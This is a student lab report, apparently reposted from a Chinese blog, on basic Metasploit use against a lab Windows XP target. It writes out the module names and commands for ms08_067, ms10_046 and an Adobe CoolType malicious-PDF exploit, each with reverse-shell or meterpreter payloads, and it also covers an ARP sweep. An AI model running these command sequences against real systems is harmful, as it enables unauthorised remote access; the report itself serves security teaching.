20155216 Exp5 MSF基础应用
Exp5 MSF基礎應用
基礎問題回答
- 1、用自己的話解釋什么是exploit,payload,encode?
exploit :
Exploit的英文意思就是利用,在做攻擊時,通常稱為漏洞利用。
一個利用程序(An exploit)就是一段通過觸發一個漏洞(或者幾個漏洞)進而控制目標系統的代碼。
exploits利用代碼可以在本地也可在遠程進行。一個遠程攻擊利用允許攻擊者遠程操縱計算機,理想狀態下能夠執行任意代碼。
payload :
payload屬于名詞,意為有效載荷,在病毒代碼中實現一些有害的或者惡性的動作的部分叫做“有效負載”(payload)。
payload可以實現任何運行在受害者環境中的程序所能做的事情,并且能夠執行動作包括破壞文件刪除文件,向病毒的作者或者任意的接收者發送敏感信息,以及提供通向被感染計算機的后門。
encode :
encode本意為編碼,可在不改變payload功能的情況下對其進行編碼,一些好的編碼方式可以使攻擊或相關的文件不被發現。
實踐內容
一、主動攻擊:ms08_067漏洞攻擊
攻擊機: kali linux x64
靶機: windows XP SP3(English)
實驗前準備:將windows XP的防火墻關閉;進入msfconsole界面。
1、先用 search ms08_067 指令查詢針對該漏洞可以運用的攻擊模塊:
根據提示,使用 use exploit/windows/smb/ms08_067_netapi 使用該模塊,并使用 show payloads 查看可以供我們使用的payload:
可查看到有很多可以使用的正常的payload。
2、選擇通過反向連接來獲取shell的 generic/shell_reverse_tcp 作為payload,使用指令 set payload generic/shell_reverse_tcp 對payload進行設置,并使用 show options 查看:
3、發現源端口和目的端口是默認固定的,需要設置一個RHOST(靶機的IP地址)和一個LHOST(攻擊機的IP地址):
使用 show options 查看設置結果:
4、接著使用 exploit 指令開始攻擊:
5、攻擊成功后獲取了靶機的shell,此時可使用 systeminfo 指令查看靶機系統信息:
二、對瀏覽器攻擊:ms10_046漏洞攻擊
1、利用search ms10_046指令查看可以運用的攻擊模塊:
2、根據提示,使用 use exploit/windows/browser/ms10_046_shortcut_icon_dllloader 使用該模塊,并使用show payloads查看:
3、使用 set payload windows/meterpreter/reverse_tcp 設置payload,并使用show options查看參數:
SRVHOST填的是本地監聽主機的IP地址,LHOST也是監聽的IP地址,所以這里SRVHOST和LHOST都應該填攻擊機的IP地址:
4、使用xp系統打開鏈接: http://192.168.52.131:80/ :
此時kali顯示接入一個會話:
5、使用 sessions -i 1 選擇會話1,成功獲取了靶機的shell,利用 systeminfo 指令查看靶機的系統信息:
三、對Adobe的漏洞攻擊
1、先使用search adobe查詢和adobe漏洞有關的模塊:
2、個人選擇: exploit/windows/fileformat/adobe_cooltype_sing ,然后show payloads查看payload:
3、選擇 windows/meterpreter/reverse_tcp ,并使用show options查看參數:
只需建立本地主機IP:LHOST,輸入 exploit 將在固定的位置生成相應的文件:
5、在文件查看處選擇顯示隱藏文件,在相應的位置找到msf.pdf:
6、將文件拷貝至windows XP下,并在kali下輸入:
use exploit/multi/handler set LHOST 192.168.52.131 set LPORT 4444 exploit7、將win XP下的PDF打開,攻擊機成功獲取到靶機shell:
四、輔助模塊的應用
1、使用 show auxiliary 查看可以運用的輔助模塊:
選擇ARP掃描,使用命令: use scanner/discovery/arp_sweep ,并使用show options查看參數:
只需設置目的主機IP即可:
也可設置一個網段進行掃描:
實驗總結與體會
通過本次實驗,再一次領略了MSF平臺功能的豐富和強大。不但可以攻擊很多方面的漏洞,還有很多各種各樣的輔助功能,光是掃描就有特別多種,幾乎覆蓋了所有的掃描方式。但也在實驗過程中發現了MSF的局限性與落后性。在針對系統的攻擊方面,只能攻擊windows XP系統,對win7系統的攻擊嘗試無效。并且針對瀏覽器的攻擊也只能攻擊IE8及以下的版本,甚至有些連IE8也攻擊不了,所以在實際應用中存在非常大的局限性。
當然,通過對MSF攻擊的學習,我們對一些理論課上學到的一些攻擊付諸實踐,對于滲透測試有了更深的理解。若要將攻擊運用到實踐中,還需不斷地研究各類新型的漏洞,并獲取更高的權限對其他主機進行掃描和注入。
離實戰還缺些什么技術或步驟?
1、在實踐中發現MSF攻擊的局限性很大,其中的漏洞幾乎都是針對win XP系統,而實際應用的系統大部分是win7及以上的系統,如果需要實戰攻擊win7及以上的系統,還需要不斷發現并成功利用新的漏洞。
2、需要提高掃描等信息收集技術,信息收集是做攻擊的重要前提,但大多數初級的掃描都會被win7及以上的系統發現甚至拒絕,所以提供相應的技術很重要。
3、在對Adobe的漏洞攻擊中,需要把PDF文件植入被攻擊主機,如果在不被發現植入危險的文件的情況下成功將攻擊所需文件植入靶機,也是一個值得深思的問題。
轉載于:https://www.cnblogs.com/LeeX1997/p/8920919.html
總結
以上是生活随笔為你收集整理的20155216 Exp5 MSF基础应用的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 基于Spring读写分离
- 下一篇: java web开发小记(6)将int类